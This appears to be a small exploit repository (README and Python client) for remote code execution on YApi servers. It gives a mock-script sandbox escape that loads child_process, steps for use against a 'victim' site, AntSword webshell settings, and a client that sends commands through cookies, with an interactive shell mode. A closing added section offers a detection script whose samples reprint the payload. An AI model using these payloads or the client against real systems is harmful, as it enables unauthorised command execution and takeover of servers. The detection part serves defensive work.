├── README.md
└── webshell.py

--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
# yapi-rce-webshell

YApi mock script RCE, another version: the webshell way.

https://github.com/YMFE/yapi/issues/2099

# funny things

Usage:

1. Pick the victim YApi site.
2. Register an account.
3. Create a project and create an API in it.
4. Create a mock script like:

```js
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()
// you can also add exec function to do some async jobs like running enum scripts
```

5. Use the Python script to connect to the webshell, either interactively or one command at a time:

```bash
python3 webshell.py {mock address, like http://whereisthevictim/mock/222/test/test} -i   # interactive mode
# or
python3 webshell.py {mock address, like http://whereisthevictim/mock/222/test/test} {working dir, "." works} {command}
```

# AntSword-like Alternative

1. Same as the usage above.
2. But create an API with an Advanced Mock POST method:

```js
const sandbox = this
const ObjectConstructor = this.constructor
const FunctionConstructor = ObjectConstructor.constructor
const myfun = FunctionConstructor('return process')
const process = myfun()
mockJson = process.mainModule.require("child_process").execSync(params.data).toString()
// you can also add exec function to do some async jobs like running enum scripts
```

3. Open AntSword.
4. Create a shell with a config like:
   - Type: CMDLINUX
   - Pass: data
   - URL: mock url in Yapi config
   - encoder: default
   - decoder: base64
5. Enjoy your webshell.

--------------------------------------------------------------------------------
/webshell.py:
--------------------------------------------------------------------------------
# Author: Esonhugh
# Date: 2022/5/14
# MockScript Came from: https://github.com/YMFE/yapi/issues/2099
# MockJson =
# const sandbox = this
# const ObjectConstructor = this.constructor
# const FunctionConstructor = ObjectConstructor.constructor
# const myfun = FunctionConstructor('return process')
# const process = myfun()
# mockJson = process.mainModule.require("child_process").execSync("cd "+cookie.dir+";"+cookie.cmd).toString()

import requests
import sys

targeturl = ""
targetdir = "."
targetcmd = ""


def main():
    # The mock script reads the working directory and the command from these two cookies.
    bad_cookie = {
        "dir": targetdir,
        "cmd": targetcmd,
    }
    print(bad_cookie)
    r = requests.get(targeturl, cookies=bad_cookie)
    print(r.text)


if __name__ == '__main__':
    targeturl = sys.argv[1]
    targetdir = sys.argv[2]
    if targetdir == "-i":
        # interactive mode: a "cd" command updates the directory sent on later requests
        while True:
            targetcmd = input("Command:")
            if targetcmd.split(" ")[0] == "cd":
                targetdir = targetcmd[2:]
            main()
    else:
        targetcmd = " ".join(sys.argv[3:])
        main()
--------------------------------------------------------------------------------
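The two mock scripts in the README and the cookie-driven client above give a YApi operator two concrete things to look for: a stored mock script that walks from the sandbox object to `Function` and loads `child_process`, and requests to a `/mock/<project>/...` endpoint whose Cookie header carries the `dir` and `cmd` names that webshell.py uses. The following is an added detection example written for this page, not code from the yapi-rce-webshell repository or from the YApi project. It assumes the mock-script bodies have been exported from the YApi instance and that the reverse proxy logs the request path and Cookie header; the script bodies, request records, the `api-222`/`api-223` ids and the `/mock/\d+/` path prefix (taken from the mock address format in the README) are constructed samples.

```python
"""Detection helpers for the YApi mock-script sandbox escape (added example).

Assumptions (not taken from the repository): mock-script bodies have been
exported from the YApi instance, and the reverse proxy logs the request path
and Cookie header. All inputs below are constructed samples.
"""
import re

# Indicators of the escape chain shown on this page: reaching the Function
# constructor from the sandbox object, pulling `process` out of it, then
# loading child_process to run shell commands. A plain mock script only
# shapes mockJson and needs none of these.
INDICATORS = {
    "constructor_access": re.compile(r"\.constructor\b"),
    "return_process_literal": re.compile(r"""['"]\s*return\s+process\s*['"]"""),
    "process_mainmodule": re.compile(r"process\s*\.\s*mainModule"),
    "child_process_require": re.compile(r"""require\s*\(\s*['"]child_process['"]\s*\)"""),
    "exec_call": re.compile(r"\.exec(?:Sync)?\s*\("),
}
ESCAPE_STAGE = {"constructor_access", "return_process_literal", "process_mainmodule"}
EXEC_STAGE = {"child_process_require", "exec_call"}

# Request shape used by webshell.py: a request to a mock endpoint with the
# working directory and the command passed as cookies named dir and cmd.
MOCK_PATH = re.compile(r"^/mock/\d+/")
WEBSHELL_COOKIES = {"dir", "cmd"}


def scan_mock_script(source):
    """Return the names of every indicator present in one mock-script body."""
    return [name for name, rx in INDICATORS.items() if rx.search(source)]


def severity(indicators):
    """'high' when an escape-stage and an exec-stage indicator both appear,
    'medium' for any single indicator, 'none' otherwise."""
    found = set(indicators)
    if found & ESCAPE_STAGE and found & EXEC_STAGE:
        return "high"
    return "medium" if found else "none"


def cookie_names(cookie_header):
    """Parse the cookie names out of a raw Cookie header value."""
    return {part.split("=", 1)[0].strip()
            for part in cookie_header.split(";") if part.strip()}


def is_webshell_request(path, cookie_header):
    """True for a request to a mock endpoint that carries both webshell cookies."""
    return bool(MOCK_PATH.match(path)) and WEBSHELL_COOKIES <= cookie_names(cookie_header)


# Constructed samples: one script using the escape chain from the README
# (params.data variant) and one ordinary mock that only shapes the response.
SAMPLE_SCRIPTS = {
    "api-222": (
        "const sandbox = this\n"
        "const ObjectConstructor = this.constructor\n"
        "const FunctionConstructor = ObjectConstructor.constructor\n"
        "const myfun = FunctionConstructor('return process')\n"
        "const process = myfun()\n"
        'mockJson = process.mainModule.require("child_process")'
        ".execSync(params.data).toString()\n"
    ),
    "api-223": "mockJson.code = 0\nmockJson.data = { id: 1, name: 'demo' }\n",
}

# Constructed proxy records as (path, Cookie header) pairs.
SAMPLE_REQUESTS = [
    ("/mock/222/test/test", "dir=.; cmd=id"),
    ("/mock/222/test/test", "_yapi_token=abc; _yapi_uid=11"),
    ("/api/project/get", "dir=.; cmd=id"),
]


def report(scripts, requests):
    """Return (flagged scripts by id -> (severity, indicators), flagged requests)."""
    flagged_scripts = {sid: (severity(ind), ind)
                       for sid, src in scripts.items()
                       for ind in [scan_mock_script(src)] if ind}
    flagged_requests = [(p, c) for p, c in requests if is_webshell_request(p, c)]
    return flagged_scripts, flagged_requests


if __name__ == "__main__":
    scripts, reqs = report(SAMPLE_SCRIPTS, SAMPLE_REQUESTS)
    for sid, (sev, ind) in scripts.items():
        print(f"[{sev}] mock script {sid}: {', '.join(ind)}")
    for path, cookie in reqs:
        print(f"[webshell] {path} cookies={cookie}")
```

The stored-script scan is the control that matters most: the AntSword variant in the README carries its command in the POST body (the `data` parameter), so it never shows up in a cookie check, but the script that executes it still has to contain the escape chain. Any of the indicators in a mock script is worth a review, because a legitimate mock only needs to assign to `mockJson`.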